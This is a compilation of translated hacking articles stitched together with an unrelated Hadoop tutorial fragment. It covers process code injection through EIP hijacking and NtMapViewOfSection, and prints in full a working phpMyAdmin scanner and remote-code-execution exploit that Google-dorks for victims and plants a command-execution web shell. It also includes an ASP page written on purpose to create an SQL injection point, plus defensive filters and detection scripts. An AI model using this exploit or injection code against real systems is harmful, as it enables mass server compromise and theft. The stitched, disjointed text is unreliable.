Below, the editor shares with readers "Hijacking a running process's EIP to inject code" (7 articles in total); everyone is welcome to share. We also hope that, like this article's contributor "在途死亡者", you will actively submit good articles to this site.
[Title]: Hijacking a running process's EIP to inject code
[Author]: 火血狼 (QQ: 65845743)
[Tools]: VC++, WinXP, Win7
[Disclaimer]: 1. Do not use this for destructive purposes; 2. Please notify the author.
-----------------------------------------------------------------------------
[Inspiration]
Recently, while reading < Hijacking a running process's EIP to inject code
[Step 1] Modify another process's EIP register
SuspendThread(hThread); // suspend the thread first so EIP does not run away
CONTEXT context;
context.ContextFlags = CONTEXT_CONTROL;
GetThreadContext(hThread, &context);
DWORD dwEIP = context.Eip;
context.ContextFlags = CONTEXT_CONTROL;
//
context.Eip = 0x000000; // set an arbitrary EIP here; this makes the target process crash
SetThreadContext(hThread, &context);
ResumeThread(hThread);
From this experiment we conclude that EIP can be set without restriction. (Here hThread is the handle of the target process's main thread; how to obtain it is shown in many places, so the basics are not repeated here.)
[Step 2] Build a valid EIP value that steers the target process's EIP into the specified code
At this step I ran into the following problems: 1. the target process can only access its own virtual address space; 2. how to put the specified code into memory.
To solve the first problem, use
PVOID pCodeRemote = VirtualAllocEx(hProcess, NULL, (size_t)dwCodeSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
This call allocates a fresh block of dwCodeSize bytes in the target process's virtual memory and returns the block's start pointer. (The page protection is execute, read and write.)
Solving the second problem requires assembly.
Write a function like this:
void __declspec(naked) __stdcall ASM_RemoteFunc(){
_asm{ int 3 }
}
Then copy this function into the memory just allocated, using
WriteProcessMemory(hProcess, pCodeRemote, (PVOID)ASM_RemoteFunc, (size_t)dwCodeSize, NULL);
At this point another question comes up: how do we determine dwCodeSize? Well, we can put a special value at the end of the function and then search for that value to find the function's end address. Let's try it.
(The naked attribute is not explained here either; readers can look it up themselves.)
void __declspec(naked) __stdcall ASM_RemoteFunc(){
_asm{ int 3; push 0x12345679 }
}
The search code is written like this:
void* find_ptr(void* mem, DWORD dwv)
{
    void* ret_ptr;
    __asm
    {
        mov eax, mem        // eax = address to start scanning from
        jmp comp
    diff:
        inc eax             // not found yet: advance one byte
    comp:
        mov ebx, [eax]      // read the DWORD at eax
        cmp ebx, dwv        // compare with the marker value
        jnz diff
        mov ret_ptr, eax    // eax now points at the marker
    }
    return ret_ptr;
}
Finally, the function size can be computed with the following code:
DWORD dwCodeStart = (DWORD)ASM_RemoteFunc;
PVOID ptrCodeLocal = (PVOID)dwCodeStart;
DWORD dwCodeEnd = (DWORD)find_ptr(ptrCodeLocal, PLACE_HOLDER_END) + 4;
DWORD dwCodeSize = dwCodeEnd - dwCodeStart;
OK, the second step's problem is solved. Trying it out: the target process does indeed raise a breakpoint exception, which shows that the specified code was executed, but in the end the program still crashes.
How can we keep the program from crashing?
[Step 3] Restoring the registers and the stack
First, analyze why the program crashes: when we changed EIP, the code could have been at any position; after executing our code we neither restored the original EIP nor preserved the values of the registers, so the target process behaves unpredictably.
How do we restore EIP? Anyone who has written shellcode knows that ret can do this: first push the current EIP, then ret at the end, and execution returns to where the original EIP pointed. So write it like this:
void __declspec(naked) __stdcall ASM_RemoteFunc(){
_asm{
push 0x12345670
ret
push 0x12345679
}
}
Some may wonder why 0x12345670 is used instead of the real EIP. Because at this point we cannot get it; it is only available at run time. So what do we do? No hurry: we use the same method as for finding the function size to locate the address of 0x12345670, then write the target process's current EIP there.
void * placeHolderEIP = find_ptr(ptrCodeLocal, 0x12345670);
memcpy((void *)placeHolderEIP, &dwEIP, 4);
Run it: it passes quietly, haha.
Next, preserve the registers and call some interesting code:
#define PLACE_HOLDER_EIP 0x12345670
#define PLACE_HOLDER_ST1 0x12345671
#define PLACE_HOLDER_ST2 0x12345672
#define PLACE_HOLDER_FUN 0x12345678
#define PLACE_HOLDER_END 0x12345679
void __declspec(naked) __stdcall ASM_RemoteFunc(){
_asm{
push PLACE_HOLDER_EIP;
pushfd;
pushad;
push MB_OK | MB_ICONINFORMATION
push PLACE_HOLDER_ST1;
push PLACE_HOLDER_ST2;
push NULL
mov eax, PLACE_HOLDER_FUN;
call eax;
popad;
popfd;
ret;
push PLACE_HOLDER_END
}
}
Using the same memory-search method, put your own values at the specified places:
HMODULE hModule = 0;
if (!(hModule = LoadLibrary(_T("User32.dll")))) return false;
DWORD funRemote = 0;
if (!(funRemote = (DWORD)GetProcAddress(hModule, "MessageBoxA"))) return false;
PVOID strRemote1 = NULL;
if (!(strRemote1 = VirtualAllocEx(hProcess, NULL, (size_t)(strlen(strPam1) + 1), MEM_COMMIT, PAGE_READWRITE))) return false;
PVOID strRemote2 = NULL;
if (!(strRemote2 = VirtualAllocEx(hProcess, NULL, (size_t)(strlen(strPam2) + 1), MEM_COMMIT, PAGE_READWRITE))) return false;
PVOID pCodeRemote = NULL;
if (!(pCodeRemote = VirtualAllocEx(hProcess, NULL, (size_t)dwCodeSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE))) return false;
Format: php
<?php
$list = array(
'/phpmyadmin/',
'/phpMyAdmin/',
'/PMA/',
'/pma/',
'/admin/',
'/dbadmin/',
'/mysql/',
'/myadmin/',
'/phpmyadmin2/',
'/phpMyAdmin2/',
'/phpMyAdmin-2/',
'/php-my-admin/',
'/phpMyAdmin-2.2.3/',
'/phpMyAdmin-2.2.6/',
'/phpMyAdmin-2.5.1/',
'/phpMyAdmin-2.5.4/',
'/phpMyAdmin-2.5.5-rc1/',
'/phpMyAdmin-2.5.5-rc2/',
'/phpMyAdmin-2.5.5/',
'/phpMyAdmin-2.5.5-pl1/',
'/phpMyAdmin-2.5.6-rc1/',
'/phpMyAdmin-2.5.6-rc2/',
'/phpMyAdmin-2.5.6/',
'/phpMyAdmin-2.5.7/',
'/phpMyAdmin-2.5.7-pl1/',
'/phpMyAdmin-2.6.0-alpha/',
'/phpMyAdmin-2.6.0-alpha2/',
'/phpMyAdmin-2.6.0-beta1/',
'/phpMyAdmin-2.6.0-beta2/',
'/phpMyAdmin-2.6.0-rc1/',
'/phpMyAdmin-2.6.0-rc2/',
'/phpMyAdmin-2.6.0-rc3/',
'/phpMyAdmin-2.6.0/',
'/phpMyAdmin-2.6.0-pl1/',
'/phpMyAdmin-2.6.0-pl2/',
'/phpMyAdmin-2.6.0-pl3/',
'/phpMyAdmin-2.6.1-rc1/',
'/phpMyAdmin-2.6.1-rc2/',
'/phpMyAdmin-2.6.1/',
'/phpMyAdmin-2.6.1-pl1/',
'/phpMyAdmin-2.6.1-pl2/',
'/phpMyAdmin-2.6.1-pl3/',
'/phpMyAdmin-2.6.2-rc1/',
'/phpMyAdmin-2.6.2-beta1/',
'/phpMyAdmin-2.6.2-rc1/',
'/phpMyAdmin-2.6.2/',
'/phpMyAdmin-2.6.2-pl1/',
'/phpMyAdmin-2.6.3/',
'/phpMyAdmin-2.6.3-rc1/',
'/phpMyAdmin-2.6.3/',
'/phpMyAdmin-2.6.3-pl1/',
'/phpMyAdmin-2.6.4-rc1/',
'/phpMyAdmin-2.6.4-pl1/',
'/phpMyAdmin-2.6.4-pl2/',
'/phpMyAdmin-2.6.4-pl3/',
'/phpMyAdmin-2.6.4-pl4/',
'/phpMyAdmin-2.6.4/',
'/phpMyAdmin-2.7.0-beta1/',
'/phpMyAdmin-2.7.0-rc1/',
'/phpMyAdmin-2.7.0-pl1/',
'/phpMyAdmin-2.7.0-pl2/',
'/phpMyAdmin-2.7.0/',
'/phpMyAdmin-2.8.0-beta1/',
'/phpMyAdmin-2.8.0-rc1/',
'/phpMyAdmin-2.8.0-rc2/',
'/phpMyAdmin-2.8.0/',
'/phpMyAdmin-2.8.0.1/',
'/phpMyAdmin-2.8.0.2/',
'/phpMyAdmin-2.8.0.3/',
'/phpMyAdmin-2.8.0.4/',
'/phpMyAdmin-2.8.1-rc1/',
'/phpMyAdmin-2.8.1/',
'/phpMyAdmin-2.8.2/',
'/sqlmanager/',
'/mysqlmanager/',
'/p/m/a/',
'/PMA2005/',
'/pma2005/',
'/phpmanager/',
'/php-myadmin/',
'/phpmy-admin/',
'/webadmin/',
'/sqlweb/',
'/websql/',
'/webdb/',
'/mysqladmin/',
'/mysql-admin/',
);
if($argc > 1) {
    print "|****************************************************************|\n";
    print " pmaPWN.php - d3ck4, hacking.expose@gmail.com\n";
    print " phpMyAdmin Code Injection RCE Scanner & Exploit\n";
    print " This is PHP version original milw0rm.com/exploits/8921\n";
    print " credit: Greg Ose, pagvac @ gnucitizen.org\n";
    print " greetz: Hacking Expose!, HM Security, darkc0de\n";
    print "|****************************************************************|\n";
    print "\n";
    print "Usage: php $argv[0] \n";
    exit;
}
print "|****************************************************************|\n";
print " pmaPWN.php - d3ck4, hacking.expose@gmail.com\n";
print " phpMyAdmin Code Injection RCE Scanner & Exploit\n";
print " This is PHP version original milw0rm.com/exploits/8921\n";
print " credit: Greg Ose, pagvac @ gnucitizen.org\n";
print " greetz: Hacking Expose!, HM Security, darkc0de\n";
print "|****************************************************************|\n";
print "\n";
$Handlex = fopen("pmaPWN.log", "a+");
fwrite($Handlex, "|****************************************************************|\n");
fwrite($Handlex, " pmaPWN.php - d3ck4, hacking.expose@gmail.com\n");
fwrite($Handlex, " phpMyAdmin Code Injection RCE Scanner & Exploit\n");
fwrite($Handlex, " This is PHP version original milw0rm.com/exploits/8921\n");
fwrite($Handlex, " credit: Greg Ose, pagvac @ gnucitizen.org\n");
fwrite($Handlex, " greetz: Hacking Expose!, HM Security, darkc0de\n");
fwrite($Handlex, "|****************************************************************|\n\n");
print "[-] Master, where you want to go today? \n";
print "[-] example dork: intitle:phpMyAdmin \n";
fwrite(STDOUT, "\n[ pwn3r@google ~] ./dork -s ");
$dork = trim(fgets(STDIN));
print "\n[!] QUERY: Select * FROM `googledb` Where `keyword` = '$dork'\n";
fwrite($Handlex, "[!] QUERY: Select * FROM `googledb` Where `keyword` = '$dork'\n");
$res = array();
$total = 0;
for($i = 0; $i <= 900; $i+=100) {
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, "www.google.com/cse?cx=013269018370076798483%3Awdba3dlnxqm&q=$dork&num=100&hl=en&as_qdr=all&start=$i&sa=N");
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_TIMEOUT, 200);
    curl_setopt($ch, CURLOPT_HEADER, 1);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($ch, CURLOPT_REFERER, "google.com");
    curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.9) Gecko/1025 Firefox/2.0.0.9');
    $pg = curl_exec($ch);
    curl_close($ch);
    if (preg_match_all("/
/", $pg, $links)) { $res[] = $links[2]; }
}
foreach($res as $key) {
    foreach($key as $target) {
        $total++;
    }
}
print "[+] Done. $total rows return.\n";
fwrite($Handlex, "[+] Done. $total rows return.\n");
fclose($Handlex);
foreach($res as $key) {
    foreach($key as $target) {
        $Handlex = fopen("pmaPWN.log", "a+");
        $real = parse_url($target);
        $url = "".$real['host'];
        print "\n[-] Scanning phpMyAdmin on ".$url."\n";
        fwrite($Handlex, "\n[-] Scanning phpMyAdmin on ".$url."\n");
        fclose($Handlex);
        sleep(5);
        $curlHandle = curl_multi_init();
        for ($i = 0;$i < count($list); $i++)
            $curl[$i] = addHandle($curlHandle,$url.$list[$i]);
        ExecHandle($curlHandle);
        for ($i = 0;$i < count($list); $i++)
        {
            $text[$i] = curl_multi_getcontent ($curl[$i]);
            //echo $url.$list[$i]."\n";
            $Handlex = fopen("pmaPWN.log", "a+");
            if (preg_match("/phpMyAdmin/", $text[$i]) or preg_match("/Access denied/", $text[$i]) and preg_match("/phpMyAdmin/", $text[$i])) {
                print "\n[!] w00t! w00t! Found phpMyAdmin [ ".$url.$list[$i]." ]";
                print "\n[+] Testing vulnerable, wait sec..\n";
                fwrite($Handlex, "\n[!] w00t! w00t! Found phpMyAdmin [ ".$url.$list[$i]." ]");
                fwrite($Handlex, "\n[+] Testing vulnerable, wait sec..\n");
                if (preg_match("/phpMyAdmin is more friendly with a/", $text[$i])) {
                    print "\n[!] w00t! w00t! NO PASSWD --> [ ".$url.$list[$i]." ]\n";
                    fwrite($Handlex, "\n[!] w00t! w00t! NO PASSWD --> [ ".$url.$list[$i]." ]\n");
                }
                fclose($Handlex);
                exploit_site($url.$list[$i]);
            }
        }
        for ($i = 0;$i < count($list); $i++)//remove the handles
            curl_multi_remove_handle($curlHandle,$curl[$i]);
        curl_multi_close($curlHandle);
        sleep(5);
    }
}
function addHandle(&$curlHandle,$url)
{
$cURL = curl_init();
curl_setopt($cURL, CURLOPT_URL, $url);
curl_setopt($cURL, CURLOPT_HEADER, 0);
curl_setopt($cURL, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($cURL, CURLOPT_TIMEOUT, 10);
curl_multi_add_handle($curlHandle,$cURL);
return $cURL;
}
//execute the handle until the flag passed
// to function is greater then 0
function ExecHandle(&$curlHandle)
{
$flag=null;
do {
//fetch pages in parallel
curl_multi_exec($curlHandle,$flag);
} while ($flag > 0);
}
function exploit_site($url) {
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_HEADER, 1);
    curl_setopt($ch, CURLOPT_TIMEOUT, 200);
    curl_setopt($ch, CURLOPT_URL, $url."scripts/setup.php");
    $result = curl_exec($ch);
    curl_close($ch);
    $ch2 = curl_init();
    curl_setopt($ch2, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch2, CURLOPT_HEADER, 1);
    curl_setopt($ch2, CURLOPT_TIMEOUT, 200);
    curl_setopt($ch2, CURLOPT_URL, $url."config/config.inc.php");
    $result2 = curl_exec($ch2);
    curl_close($ch2);
    //print $url;
    if (preg_match("/200 OK/", $result) and preg_match("/token/", $result) and preg_match("/200 OK/", $result2)) {
        print "\n[!] w00t! w00t! Found possible phpMyAdmin vuln";
        print "\n[+] Exploiting, wait sec..\n";
        $Handlex = fopen("pmaPWN.log", "a+");
        fwrite($Handlex, "\n[!] w00t! w00t! Found possible phpMyAdmin vuln");
        fwrite($Handlex, "\n[+] Exploiting, wait sec..\n");
        fclose($Handlex);
        exploit($url);
    }
    else {
        $Handlex = fopen("pmaPWN.log", "a+");
        print "\n[-] Shit! no luck.. not vulnerable\n";
        fwrite($Handlex, "\n[-] Shit! no luck.. not vulnerable\n");
        fclose($Handlex);
    }
}
function exploit($w00t) {
    $Handlex = fopen("pmaPWN.log", "a+");
    $useragent = "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/1217 Firefox/2.0.0.20 (.NET CLR 3.5.30729) "; //firefox
    //first get cookie + token
    $curl = curl_init();
    curl_setopt($curl, CURLOPT_URL, $w00t."scripts/setup.php"); //URL
    curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 20);
    curl_setopt($curl, CURLOPT_USERAGENT, $useragent);
    curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($curl, CURLOPT_TIMEOUT, 200);
    curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
    curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false);
    curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); //return site as string
    curl_setopt($curl, CURLOPT_COOKIEFILE, "exploitcookie.txt");
    curl_setopt($curl, CURLOPT_COOKIEJAR, "exploitcookie.txt");
    $result = curl_exec($curl);
    curl_close($curl);
    if (preg_match_all('/token"\s+value="([^>]+?)"/', $result, $matches));
    $token = $matches[1][1];
    if ($token != '') {
        print "\n[!] w00t! w00t! Got token = " . $matches[1][1];
        fwrite($Handlex, "\n[!] w00t! w00t! Got token = " . $matches[1][1]);
        $payload = "token=".$token."&action=save&configuration=a:1:{s:7:%22Servers%22%3ba:1:{i:0%3ba:6:{s:136:%22host%27%5d=%27%27%3b%20if($_GET%5b%27c%27%5d){echo%20%27%3cpre%3e%27%3bsystem($_GET%5b%27c%27%5d)%3becho%20%27%3c/pre%3e%27%3b}if($_GET%5b%27p%27%5d){echo%20%27%3cpre%3e%27%3beval($_GET%5b%27p%27%5d)%3becho%20%27%3c/pre%3e%27%3b}%3b//%22%3bs:9:%22localhost%22%3bs:9:%22extension%22%3bs:6:%22mysqli%22%3bs:12:%22connect_type%22%3bs:3:%22tcp%22%3bs:8:%22compress%22%3bb:0%3bs:9:%22auth_type%22%3bs:6:%22config%22%3bs:4:%22user%22%3bs:4:%22root%22%3b}}}&eoltype=unix";
        print "\n[+] Sending evil payload mwahaha.. \n";
        fwrite($Handlex, "\n[+] Sending evil payload mwahaha.. \n");
        $curl = curl_init();
        curl_setopt($curl, CURLOPT_URL, $w00t."scripts/setup.php");
        curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 20);
        curl_setopt($curl, CURLOPT_TIMEOUT, 200);
        curl_setopt($curl, CURLOPT_USERAGENT, $useragent);
        curl_setopt($curl, CURLOPT_REFERER, $w00t);
        curl_setopt($curl, CURLOPT_POST, true);
        curl_setopt($curl, CURLOPT_POSTFIELDS, $payload);
        curl_setopt($curl, CURLOPT_COOKIEFILE, "exploitcookie.txt");
        curl_setopt($curl, CURLOPT_COOKIEJAR, "exploitcookie.txt");
        curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 3);
        curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1);
        curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, FALSE);
        $result = curl_exec($curl);
        curl_close($curl);
        print "\n[!] w00t! w00t! You should now have shell here";
        print "\n[+] ".$w00t."config/config.inc.php?c=id \n";
        print "\n[!] Saved. Dont forget to check `pmaPWN.log`\n";
        fwrite($Handlex, "\n[!] w00t! w00t! You should now have shell here");
        fwrite($Handlex, "\n[+] ".$w00t."config/config.inc.php?c=id \n");
    }
    else {
        print "\n[!] Shit! no luck.. not vulnerable\n";
        fwrite($Handlex, "\n[!] Shit! no luck.. not vulnerable\n");
        return false;
    }
    fclose($Handlex);
    if (file_exists('exploitcookie.txt')) { unlink('exploitcookie.txt'); }
    //exit();
}
?>
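The scanner above leaves a distinctive footprint in a web server's access log: one client requesting many of the directory names in $list in quick succession (almost all of them answered 404), then a POST to scripts/setup.php, and finally requests to config/config.inc.php with a c= or p= query parameter. The following Python script is an added detection example, not part of the original exploit script; it parses constructed Apache combined-format log lines (the IPs, timestamps and paths are made up for the example) and flags clients that match that pattern. The path regex, the indicator names and the threshold of 5 distinct probes are my assumptions, not anything from the scanner.

```python
import re
from collections import defaultdict

# Constructed Apache combined-format lines (documentation IPs, not real traffic).
# Lines 1-9 imitate one client walking the scanner's path list, fetching and
# POSTing scripts/setup.php and then calling the planted config.inc.php?c= hook;
# lines 10-11 are an ordinary administrator session that must not be flagged.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Mar/2010:12:00:01 +0000] "GET /phpmyadmin/ HTTP/1.1" 404 211 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Mar/2010:12:00:01 +0000] "GET /phpMyAdmin/ HTTP/1.1" 404 211 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Mar/2010:12:00:02 +0000] "GET /PMA/ HTTP/1.1" 404 211 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Mar/2010:12:00:02 +0000] "GET /phpMyAdmin-2.6.0/ HTTP/1.1" 404 211 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Mar/2010:12:00:02 +0000] "GET /phpMyAdmin-2.8.2/ HTTP/1.1" 404 211 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Mar/2010:12:00:03 +0000] "GET /mysqladmin/ HTTP/1.1" 404 211 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Mar/2010:12:00:03 +0000] "GET /pma/scripts/setup.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Mar/2010:12:00:09 +0000] "POST /pma/scripts/setup.php HTTP/1.1" 200 812 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Mar/2010:12:00:15 +0000] "GET /pma/config/config.inc.php?c=id HTTP/1.1" 200 90 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Mar/2010:12:01:00 +0000] "GET /pma/index.php HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Mar/2010:12:01:05 +0000] "GET /pma/sql.php?db=test HTTP/1.1" 200 4000 "-" "Mozilla/5.0"
"""

# Combined log format: ip ident user [ts] "METHOD path proto" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
# First path segment shaped like the admin-directory names the scanner walks
# (assumed pattern: phpmyadmin, phpMyAdmin-2.x.y, pma, PMA2005, mysqladmin, webdb, ...).
ADMIN_PROBE_RE = re.compile(
    r'^/(?:php-?my-?admin|phpmy-admin|pma\d*|p/m/a|admin|dbadmin|mysql|myadmin'
    r'|sqlmanager|mysqlmanager|phpmanager|webadmin|sqlweb|websql|webdb)[^/]*/',
    re.IGNORECASE,
)
SETUP_RE = re.compile(r'/scripts/setup\.php$', re.IGNORECASE)
# The payload in exploit() plants handlers for GET parameters c= and p=.
CONFIG_CMD_RE = re.compile(r'/config/config\.inc\.php\?(?:c|p)=', re.IGNORECASE)


def parse_line(line):
    """Return the fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec


def analyze(log_text, probe_threshold=5):
    """Map client IP -> list of reasons it looks like the pmaPWN scan/exploit pattern."""
    per_ip = defaultdict(lambda: {"probes": set(), "setup_posts": 0, "config_cmds": 0})
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        st = per_ip[rec["ip"]]
        path = rec["path"]
        if rec["method"] == "POST" and SETUP_RE.search(path):
            st["setup_posts"] += 1              # configuration written via setup.php
        elif CONFIG_CMD_RE.search(path):
            st["config_cmds"] += 1              # planted hook being invoked
        elif rec["status"] == 404 and ADMIN_PROBE_RE.match(path):
            st["probes"].add(path)              # directory guess that did not exist
    findings = {}
    for ip, st in per_ip.items():
        reasons = []
        if len(st["probes"]) >= probe_threshold:
            reasons.append("%d distinct phpMyAdmin-style directories returned 404" % len(st["probes"]))
        if st["setup_posts"]:
            reasons.append("%d POST(s) to scripts/setup.php" % st["setup_posts"])
        if st["config_cmds"]:
            reasons.append("%d request(s) to config/config.inc.php with c= or p=" % st["config_cmds"])
        if reasons:
            findings[ip] = reasons
    return findings


if __name__ == "__main__":
    for ip, reasons in analyze(SAMPLE_LOG).items():
        print(ip)
        for reason in reasons:
            print("  -", reason)
```

The three indicators are deliberately scored separately: a burst of 404s on admin-directory names is reconnaissance and may be noisy on a busy host, whereas a POST to scripts/setup.php on a production server, or any hit on config/config.inc.php carrying c= or p=, is worth an alert on its own. Running the script on a real log only needs SAMPLE_LOG replaced by the file's contents; time-windowing the probe count is the obvious next refinement and is left out to keep the example short.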
9. Create a new Map/Reduce project:
Select Project:
Create the Map/Reduce project:
Project name:
10. Copy the bundled WordCount code into it:
11. Create a test document on the local disk:
Upload it to HDFS:
Refresh:
The new document is shown, and the content just written can be seen:
12. Run the code:
Right-click → Run As → Run Configurations:
13. Set the input and output paths of the documents on HDFS:
Separated by a space:
hdfs://localhost:8020/input/file4.txt hdfs://localhost:8020/output/out4.txt
Console:
View the content of the generated out4.txt:
14. The run is complete:
15. Hadoop can now be shut down:
/*************************
Description:
Checks whether the passed variables, such as $_POST and $_GET, contain illegal characters
Function:
Anti-injection
**************************/
// illegal strings to filter
$ArrFiltrate=array("'", ";", "union");
// url to redirect to on error; if empty, defaults to the previous page
$StrGoUrl="";
// does any value in the array occur in the string
function FunStringExist($StrFiltrate,$ArrFiltrate){
    foreach ($ArrFiltrate as $key=>$value){
        // case-insensitive substring test; the original used eregi(), which was removed in PHP 7
        if (stripos($StrFiltrate,$value)!==false){
            return true;
        }
    }
    return false;
}
// merge $_POST and $_GET (the original read the long-removed $HTTP_POST_VARS / $HTTP_GET_VARS)
if(function_exists('array_merge')){
    $ArrPostAndGet=array_merge($_POST,$_GET);
}else{
    foreach($_POST as $key=>$value){
        $ArrPostAndGet[]=$value;
    }
    foreach($_GET as $key=>$value){
        $ArrPostAndGet[]=$value;
    }
}
// start validation
foreach($ArrPostAndGet as $key=>$value){
    if (FunStringExist($value,$ArrFiltrate)){
        echo "";
        if (empty($StrGoUrl)){
            echo "";
        }else{
            echo "";
        }
        exit;
    }
}
?>
Save this as checkpostandget.php.
Then add include("checkpostandget.php"); at the top of every php file, and that is all.
Code 1:
<%
'-------- Definitions ------------------
Dim Fy_Post,Fy_Get,Fy_In,Fy_Inf,Fy_Xh,Fy_db,Fy_dbstr
' Custom list of strings to filter, separated by "防"
Fy_In = "'防;防and防exec防insert防select防delete防update防count防*防%防chr防mid防master防truncate防char防declare防<防>防=防|防-防_"
Fy_Inf = split(Fy_In, "防")
If Request.Form <> "" Then
For Each Fy_Post In Request.Form
For Fy_Xh=0 To Ubound(Fy_Inf)
If Instr(LCase(Request.Form(Fy_Post)),Fy_Inf(Fy_Xh)) <> 0 Then
Response.Write "
Although an injection point can be constructed this way, it has limitations!
<%
dim rs,strSQL,id
set rs=server.createobject("ADODB.recordset")
id = request("id")
strSQL = "select * from admin where id=" & id
rs.open strSQL,conn,1,3
rs.close
%>
In the line strSQL = "select * from admin where id=" & id, replace admin with the table name you want to fake; note that the table must exist.
Then enter: target-IP/zhuru.asp?id=1
It is that simple. Then scan this injection point with an injection tool: list directories, back up, anything you want to do!
-----------------------------
conn.asp file code:
<%
strSQLServerName = "127.0.0.1" ' server name or address
strSQLDBUserName = "sa" ' database account
strSQLDBPassword = "123456789" ' database password
strSQLDBName = "db_database" ' database name
Set conn = Server.CreateObject("ADODB.Connection")
strCon = "Provider=SQLOLEDB.1;Persist Security Info=False;Server=" & strSQLServerName & ";User ID=" & strSQLDBUserName & ";Password=" & strSQLDBPassword & ";Database=" & strSQLDBName & ";"
conn.open strCon
%>
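Two of the articles above meet at the same point: the checkpostandget.php blacklist ("'", ";", "union") tries to catch injection by inspecting input, while zhuru.asp shows the actual defect, a request parameter concatenated straight into "select * from admin where id=" & id. The following Python script is an added example, not code from either article, written against an in-memory sqlite3 table instead of ASP/ADODB so it runs anywhere. It re-implements the blacklist check, reproduces the concatenated query, and puts the parameterized form beside it; the table rows and the inputs are constructed for the example.

```python
import sqlite3

# Blacklist from checkpostandget.php: any of these substrings rejects the request.
BLACKLIST = ("'", ";", "union")


def blacklist_rejects(value):
    """Python equivalent of FunStringExist(): case-insensitive substring match."""
    lowered = value.lower()
    return any(token in lowered for token in BLACKLIST)


def make_db():
    """Constructed in-memory table standing in for the 'admin' table of zhuru.asp."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE admin (id INTEGER PRIMARY KEY, username TEXT NOT NULL)")
    conn.executemany("INSERT INTO admin (id, username) VALUES (?, ?)",
                     [(1, "alice"), (2, "O'Brien"), (3, "bob")])
    return conn


def find_by_id_concat(conn, raw_id):
    """Mirrors zhuru.asp: strSQL = "select * from admin where id=" & id.
    The request parameter becomes part of the SQL text, so it can change
    the WHERE clause, not just the value compared."""
    sql = "SELECT id, username FROM admin WHERE id=" + raw_id
    return conn.execute(sql).fetchall()


def find_by_id_param(conn, raw_id):
    """Hardened form: validate the type, then bind the value as a parameter.
    Whatever the string contains, it is only ever compared as a value."""
    try:
        id_value = int(raw_id)
    except ValueError:
        return []
    return conn.execute("SELECT id, username FROM admin WHERE id=?", (id_value,)).fetchall()


def find_by_name_param(conn, name):
    """Binding also handles quotes in legitimate data; the blacklist above
    would have rejected this request before it reached the database."""
    return conn.execute("SELECT id, username FROM admin WHERE username=?", (name,)).fetchall()


if __name__ == "__main__":
    db = make_db()
    print("blacklist on O'Brien  :", blacklist_rejects("O'Brien"))        # True: a false positive
    print("blacklist on 1 OR 1=1 :", blacklist_rejects("1 OR 1=1"))       # False: nothing listed appears
    print("concat,  id=2         :", find_by_id_concat(db, "2"))
    print("concat,  id=1 OR 1=1  :", find_by_id_concat(db, "1 OR 1=1"))   # every row comes back
    print("param,   id=1 OR 1=1  :", find_by_id_param(db, "1 OR 1=1"))    # no rows
    print("param,   name=O'Brien :", find_by_name_param(db, "O'Brien"))
```

The two outputs side by side make the point of the ASP article's "limitations" remark from the defender's side: a substring blacklist both rejects honest data and misses inputs that contain none of its tokens, whereas a bound parameter removes the question entirely because the input never reaches the SQL parser. The same parameter binding is available to classic ASP through ADODB.Command with a Parameters collection, and to PHP through PDO or mysqli prepared statements.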
I have worked out a new possibility for executing code in a remote process: an undocumented function is used to write the code into the remote process's address space, and a new technique is used to execute it there. The technique works entirely in user mode and needs no special conditions such as administrator rights. Let the source speak for itself (I apologize for my English; I am from Germany).
Code:
#define _WIN32_WINNT 0x0400
#include <windows.h>
typedef LONG NTSTATUS, *PNTSTATUS;
#define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)
typedef enum _SECTION_INHERIT
{
    ViewShare = 1,
    ViewUnmap = 2
} SECTION_INHERIT;
typedef NTSTATUS (__stdcall *func_NtMapViewOfSection) ( HANDLE, HANDLE, LPVOID, ULONG, SIZE_T, LARGE_INTEGER*, SIZE_T*, SECTION_INHERIT, ULONG, ULONG );
func_NtMapViewOfSection NtMapViewOfSection = NULL;
LPVOID NTAPI MyMapViewOfFileEx( HANDLE hProcess, HANDLE hFileMappingObject, DWORD dwDesiredAccess, DWORD dwFileOffsetHigh, DWORD dwFileOffsetLow,
